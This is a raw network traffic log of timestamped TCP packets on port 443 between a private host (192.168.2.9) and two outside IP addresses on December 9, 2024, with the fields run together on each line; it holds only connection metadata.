                                                                                                                                            Dec 9, 2024 17:39:37.074562073 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.074616909 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.074642897 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.074656963 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.074856043 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.096594095 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.096612930 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.096707106 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.096723080 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.096793890 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.118380070 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.118405104 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.118495941 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.118513107 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.118567944 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.137238026 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.137259960 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.137331963 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.137348890 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.137386084 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.159126997 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.159146070 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.159192085 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.159207106 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.159234047 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.159257889 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.180907011 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.180926085 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.180978060 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.180996895 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.181014061 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.181014061 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.181036949 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.197401047 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.197419882 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.197514057 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.197525978 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.197568893 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.215035915 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.215054989 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.215102911 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.215117931 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.215150118 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.215168953 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.227725983 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.227746964 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.227802992 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.227818966 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.227858067 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.227869987 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.241656065 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.241672993 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.241728067 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.241743088 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.241766930 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.241795063 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.254113913 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.254132986 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.254193068 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.254206896 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.254244089 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.261215925 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.261240005 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.261279106 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.261290073 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.261318922 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.261332035 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.268794060 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.268811941 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.268857956 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.268867970 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.268887043 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.268903017 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.275522947 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.275540113 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.275604010 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.275615931 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.275628090 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.275644064 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.275656939 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.280869007 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.280936003 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.280945063 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.280949116 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.280976057 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.280996084 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.290874004 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.290894032 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:56.593446016 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:56.593486071 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:56.593815088 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:56.616122007 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:56.616137028 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:57.852982044 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:57.853157997 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:57.897756100 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:57.897774935 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:57.898176908 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:57.898402929 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:57.899971962 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:57.943327904 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.519699097 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.519722939 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.519758940 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.519840002 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.519840002 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.519860029 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.519912958 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.563493967 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.563519001 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.563611984 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.563633919 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.565969944 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.712332964 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.712358952 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.712495089 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.712521076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.712888002 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.743104935 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.743132114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.743211031 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.743235111 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.744402885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.768425941 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.768456936 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.768564939 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.768564939 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.768588066 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.768630981 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.798729897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.798754930 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.798799992 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.798819065 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.798832893 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.801990032 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.912250042 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.912272930 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.912338972 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.912358999 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.912396908 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.912396908 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.934622049 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.934649944 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.934693098 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.934711933 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.934729099 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.934757948 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.952163935 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.952191114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.952334881 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.952346087 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.952413082 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.972395897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.972419977 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.972539902 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.972556114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.972639084 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.992846012 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.992866039 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.992940903 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:58.992957115 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:58.993036032 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.010334969 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.010359049 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.010425091 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.010440111 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.010462999 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.010538101 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.100420952 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.100442886 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.100512028 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.100533009 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.100588083 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.115833044 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.115854025 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.115923882 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.115946054 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.115993977 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.129815102 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.129832983 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.129894972 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.129918098 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.130001068 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.141274929 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.141299009 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.141345978 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.141362906 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.141391039 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.141505003 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.151413918 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.151447058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.151493073 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.151515961 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.151556969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.151556969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.158869028 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.158901930 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.158956051 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.158987045 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.159035921 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.159035921 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.166445017 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.166464090 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.166569948 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.166569948 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.166587114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.166706085 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.174165010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.174185991 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.174237967 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.174257994 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.174290895 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.174381018 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.291032076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.291064978 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.291136980 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.291157007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.291174889 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.291235924 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.298126936 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.298150063 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.298221111 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.298233986 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.298295021 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.298295021 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.304907084 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.304924965 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.305003881 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.305016041 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.305063963 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.311536074 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.311573029 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.311645985 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.311655045 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.311706066 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.311706066 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.317424059 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.317451000 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.317550898 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.317550898 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.317559004 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.317626953 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.324659109 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.324690104 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.324757099 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.324767113 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.324836969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.330418110 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.330450058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.330528975 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.330528975 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.330537081 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.330598116 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.365724087 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.365751028 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.365803957 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.365817070 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.365849972 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.365874052 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.483819008 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.483846903 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.483926058 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.483937979 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.483999968 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.489602089 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.489625931 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.489706993 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.489717007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.489895105 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.489895105 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.496617079 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.496645927 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.496702909 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.496721983 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.496772051 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.496772051 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.503341913 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.503367901 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.503529072 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.503540993 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.503616095 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.509303093 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.509325981 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.509421110 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.509430885 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.509469032 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.517245054 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.517270088 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.517369986 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.517369986 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.517379999 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.517574072 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.522017002 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.522044897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.522113085 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.522119999 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.522186995 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.522186995 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.549010038 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.549035072 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.549096107 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.549105883 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.549158096 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.549158096 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:39:59.682106018 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:59.682130098 CET44349713107.167.96.30192.168.2.9
